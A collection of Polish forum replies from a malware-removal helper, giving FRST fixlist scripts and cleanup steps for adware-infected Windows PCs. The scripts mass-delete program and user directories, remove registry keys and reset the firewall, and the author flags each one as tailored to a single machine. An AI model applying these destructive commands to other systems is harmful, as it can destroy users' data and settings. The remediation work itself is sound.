HKLM\SYSTEM\CurrentControlSet\Services\Partner Service RemoveDirectory: C:\Program Files\WinRAR RemoveDirectory: C:\Program Files (x86)\BrowseMark RemoveDirectory: C:\Program Files (x86)\Garmin RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Program Files (x86)\SupTab RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\plugins RemoveDirectory: C:\Program Files (x86)\Mozilla Thunderbird RemoveDirectory: C:\ProgramData\Adobe RemoveDirectory: C:\ProgramData\ALLPlayer RemoveDirectory: C:\ProgramData\BonanzaDealsLive RemoveDirectory: C:\ProgramData\Electronic Arts RemoveDirectory: C:\ProgramData\Garmin RemoveDirectory: C:\ProgramData\Origin RemoveDirectory: C:\ProgramData\Partner RemoveDirectory: C:\ProgramData\Skype RemoveDirectory: C:\ProgramData\WindowsMangerProtect RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avalon RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codecs for Windows 7 Pack RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sierra RemoveDirectory: C:\Users\Ania\AppData\Local\BonanzaDealsLive RemoveDirectory: C:\Users\Ania\AppData\Local\Facebook RemoveDirectory: C:\Users\Ania\AppData\Local\Garmin RemoveDirectory: C:\Users\Ania\AppData\Local\genienext RemoveDirectory: C:\Users\Ania\AppData\Local\Google RemoveDirectory: C:\Users\Ania\AppData\Local\Mobogenie RemoveDirectory: C:\Users\Ania\AppData\Local\PriceFountain RemoveDirectory: C:\Users\Ania\AppData\Local\PriceMeter RemoveDirectory: C:\Users\Ania\AppData\Local\Thunderbird RemoveDirectory: C:\Users\Ania\AppData\Local\Microsoft\BingSvc RemoveDirectory: C:\Users\Ania\AppData\Local\Microsoft\Windows\GameExplorer\{F16DF3ED-1A45-4966-8A2A-ED2D02E279EE} RemoveDirectory; C:\Users\Ania\AppData\Roaming\BitComet RemoveDirectory: C:\Users\Ania\AppData\Roaming\Garmin RemoveDirectory: C:\Users\Ania\AppData\Roaming\mystartsearch RemoveDirectory: C:\Users\Ania\AppData\Roaming\newnext.me RemoveDirectory: C:\Users\Ania\AppData\Roaming\OpenCandy RemoveDirectory: C:\Users\Ania\AppData\Roaming\Systweak RemoveDirectory: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie RemoveDirectory: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PriceFountain RemoveDirectory: C:\Windows\SysWOW64\AI_RecycleBin RemoveDirectory: C:\Windows\SysWOW64\C2MP C:\ProgramData\*.* C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS Utility\e-Driver.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS Utility\eManual.Lnk C:\Users\Ania\daemonprocess.txt C:\Users\Ania\AppData\Local\WebpageIcons.db C:\Users\Ania\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk C:\Windows\SIERRA.INI C:\Windows\system32\roboot64.exe CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Ania\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Wyczyść Dzienniki zdarzeń (gałęzie Aplikacja + System) i po tym zresetuj Windows, by się nagrały nowe błędy. Zrób nowy log FRST z opcji Skanuj (Scan), z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Otwórz załączony plik fixlog.txt - podczas przeklejania skryptu do Notatnika wystąpiły błędy, tzn. wszystkie linie zostały sklejone oraz pojawiły się artefakty (encje HTML, których w logu nie było). Skrypt wklejony do Notatnika musi mieć identyczne przejścia do nowej linii jak w moim poście. Konsekwencją jest, że skrypt FRST nie przetworzył wszystkich obiektów jak należy. Kolejne poprawki: Otwórz Notatnik i wklej w nim (6 linii): AppInit_DLLs: C:\DOCUME~1\ALLUSE~1\DANEAP~1\Lightzap\Viva-Ex.dll => Brak pliku SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKU\S-1-5-21-1993962763-1801674531-1606980848-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csCgilr6SpemyARzQtGnhdvRN9XuvTfNFYA54KEhemNWHT48ThQPQwQVqDQ5KH4pAI7Nzb7ygy76KzzgQdD78O06WAHxEZZWaDmfjnNwnoxijbVAG-WYSm4UEwTomhN43hbJEh-y6-ZMO0gNWamCTQ,, RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Wątpię. To co było w systemie to adware, a w tym typie Kaspersky nie jest aż tak specjalizowany.

Wszystko pomyślnie wykonane. Kolejna porcja czynności: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Ustaw Google Chrome jako domyślną przeglądarkę. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 2. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-2442656019-2658457348-799937204-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=G1Szamobl15047,5760a648-8657-4332-9046-87f354fc5f2b,&vp=ch&prd=set_ie SearchScopes: HKU\S-1-5-21-2442656019-2658457348-799937204-1002 -> {D781B30C-5460-4760-84E6-8193ED359A44} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G1Szamobl15047,5760a648-8657-4332-9046-87f354fc5f2b, CHR HKU\S-1-5-21-2442656019-2658457348-799937204-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 C:\Users\Piotr Nalewajko\AppData\Local\svcxdcl32.dat RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\MATS RemoveDirectory: E:\Users\Piotr RemoveDirectory: E:\Users\Piotr.SadBanana RemoveDirectory: E:\Users\SadB Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu (ale nie jest wykluczony). Przedstaw wynikowy fixlog.txt. 3. Wykonaj polecenie sfc /scannow, przefiltruj CBS.log i przedstaw końcowy log: KLIK.

Wszystko zrobione. Kończymy: 1. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. W Dzienniku zdarzeń są takie oto błędy: Dziennik System: ============= Error: (02/06/2016 09:56:36 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa HP CUE DeviceDiscovery Zawieszenia usługi Hewlett-Packard, które powinno mieć odbicie w dłuższym uruchamianiu systemu. Wyłącz usługę. Start > w polu szukania services.msc > z prawokliku Uruchom jako Administrator > dwuklik na w/w usługę i Typ uruchomienia przestaw na Wyłączony. Dziennik Aplikacja: ================== Error: (02/06/2016 09:55:42 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Błędzik natury kosmetycznej, ale można go zlikwidować posługując się wytycznymi z KB950375. Wklej do Notatnika skrypt podany na stronie, zapisz pod nazwą FIX.VBS, plik umieścić na C:\, następnie Start > w polu szukania cmd > z prawokliku Uruchom jako Administrator > wklep C:\FIX.VBS i ENTER.

Wszystko pomyślnie wykonane. Teraz zrób skan za pomocą Hitman Pro i dostarcz wynikowy raport.

Operacje pomyślnie wykonane. Teraz: 1. Ostatnia drobna poprawka. Otwórz Notatnik i wklej w nim: Task: {B7FDD4C4-27FF-4DD4-89CA-DB3BC9D5EBA7} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Po jego pokazaniu: 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Cały system do aktualizacji. Stan obecny to brak SP2, IE9 i reszty łat: Platform: Microsoft® Windows Vista™ Home Premium Service Pack 1 (X86) Język: Polski (Polska) Internet Explorer Wersja 7 (Domyślna przeglądarka: FF) A na koniec zainstaluj Adobe Reader XI 11.0.14. Linki pobierania w w/w linku.

Wejdź w Tryb awaryjny Windows i ponów zadanie ze skryptem FRST.

Temat przenoszę do działu Windows. Nic tu nie wskazuje, by problemy nadal tworzyła infekcja, są jakieś mało istotne martwe szczątki adware. Natomiast problem może tworzyć: instalacja Panda (to świeży nabytek) i/lub uszkodzenia plików Windows (notuję przynajmniej jeden niepodpisany cyfrowo plik Microsoftu). S3 msiserver; C:\Windows\System32\msiexec.exe [65536 2015-09-10] (Microsoft Corporation) [brak podpisu cyfrowego] Wstępnie: 1. Szybkie doczyszczenie szczątków w spoilerze. 2. Wykonaj sprawdzanie sfc /scannow i dostarcz wynikowy przefiltrowany log: KLIK.